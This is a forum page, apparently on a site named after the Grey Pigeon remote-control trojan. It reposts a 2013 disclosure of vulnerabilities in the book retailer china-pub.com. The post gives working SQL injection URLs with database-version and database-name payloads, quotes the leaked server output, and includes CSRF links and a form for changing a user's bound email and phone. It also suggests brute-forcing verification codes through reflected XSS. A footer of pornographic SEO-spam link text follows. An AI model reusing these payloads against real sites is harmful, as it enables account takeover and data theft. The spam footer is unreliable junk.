灰鴿子遠(yuǎn)程控制軟件

標(biāo)題: 中國互動(dòng)出版網(wǎng)SQL注入漏洞、csrf修改綁定郵箱、反射型xss [打印本頁]

作者: admin    時(shí)間: 2013-4-29 20:12
標(biāo)題: 中國互動(dòng)出版網(wǎng)SQL注入漏洞、csrf修改綁定郵箱、反射型xss
中國互動(dòng)出版網(wǎng)SQL注入漏洞、csrf修改綁定郵箱、反射型xss
灰鴿子  本文轉(zhuǎn)載。
Microsoft SQL Server 2000 - 8.00.2039 (Intel X86)
May 3 2005 23:18:38
Copyright (c) 1988-2003 Microsoft Corporation
Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 4)

GET請求CSRF:
http://www.china-pub.com/member/ ... ail=yourmail@qq.com

XSS:
http://www.china-pub.com/member/ ... 0src=http://g.cn%3E

綁定手機(jī)號CSRF,發(fā)送驗(yàn)證碼的操作可以通過XSS調(diào)用:

<form action="http://www.china-pub.com/member/mypub2010/user/ver_tel.asp" method="post">
<input name="ym" value="3124"/>
<input name="yz" value="2"/>
<input name="x" value="65"/>
<input name="y" value="26" type="submit"/>
</form>
利用上面的XSS從1-10000頭到尾POST一遍估計(jì)就出來了
漏洞證明:http://member.china-pub.com/Car/OrderDetail.aspx?o=4206136 and 1=(select @@VERSION)
Microsoft SQL Server 2000 - 8.00.2039 (Intel X86)
May 3 2005 23:18:38
Copyright (c) 1988-2003 Microsoft Corporation
Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 4)

http://member.china-pub.com/Car/OrderDetail.aspx?o=4206136 And 1=(select db_name())
dbinfo

http://member.china-pub.com/Car/ ... 20OR%204206137%22--

字符串 '-- and member='awsotr' order by cpub_shopping_member_info.orderid desc' 之前有未閉合的引號。
第 1 行: '-- and member='awsotr' order by cpub_shopping_member_info.orderid desc' 附近有語法錯(cuò)誤。
Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

Exception Details: System.Data.SqlClient.SqlException: 字符串 '-- and member='awsotr' order by cpub_shopping_member_info.orderid desc' 之前有未閉合的引號。
第 1 行: '-- and member='awsotr' order by cpub_shopping_member_info.orderid desc' 附近有語法錯(cuò)誤。
(, 下載次數(shù): 521)

作者: 282198284    時(shí)間: 2013-5-3 00:15
是什么??????????????
作者: 282198284    時(shí)間: 2013-5-3 00:16
看不懂!!!!
作者: 1013297717    時(shí)間: 2013-5-13 18:11
不錯(cuò),很給力呀!




歡迎光臨 灰鴿子遠(yuǎn)程控制軟件 (http://www.dumiaotech.com/) Powered by Discuz! X3.4
主站蜘蛛池模板: 国产99久久九九精品无码| 无码人妻精品一区二区在线视频| 少妇精品无码一区二区三区| 亚洲一区二区三区AV无码| 精品无码国产一区二区三区麻豆| 亚洲国产成人精品无码一区二区 | 中文字幕无码人妻AAA片| 免费无码看av的网站| 亚洲桃色AV无码| 久久久久久亚洲精品无码| 亚洲av无码偷拍在线观看| 精品国产aⅴ无码一区二区| 亚洲精品无码专区2| 中文字幕人妻无码专区| 中文字幕无码不卡免费视频| 四虎国产精品永久在线无码| 亚洲AV无码乱码在线观看裸奔| 亚洲国产a∨无码中文777| 国产精品无码一本二本三本色| 制服在线无码专区| 亚洲av无码精品网站| 日韩人妻无码中文字幕视频| 日韩成人无码中文字幕| 免费A级毛片av无码| 成人无码区免费视频观看| 精品久久久无码21p发布| 久久午夜无码鲁丝片秋霞| 亚洲AV人无码综合在线观看| 内射人妻少妇无码一本一道| 亚洲?V无码乱码国产精品 | 中文字幕久久久人妻无码| 亚洲AV人无码激艳猛片| 少妇无码AV无码专区在线观看 | 午夜无码A级毛片免费视频| 潮喷无码正在播放| 国产在线无码一区二区三区视频| 中文无码熟妇人妻AV在线 | 久久老子午夜精品无码怎么打| 伊人久久精品无码av一区| 无码久久精品国产亚洲Av影片| 人妻丰满熟妇AV无码片|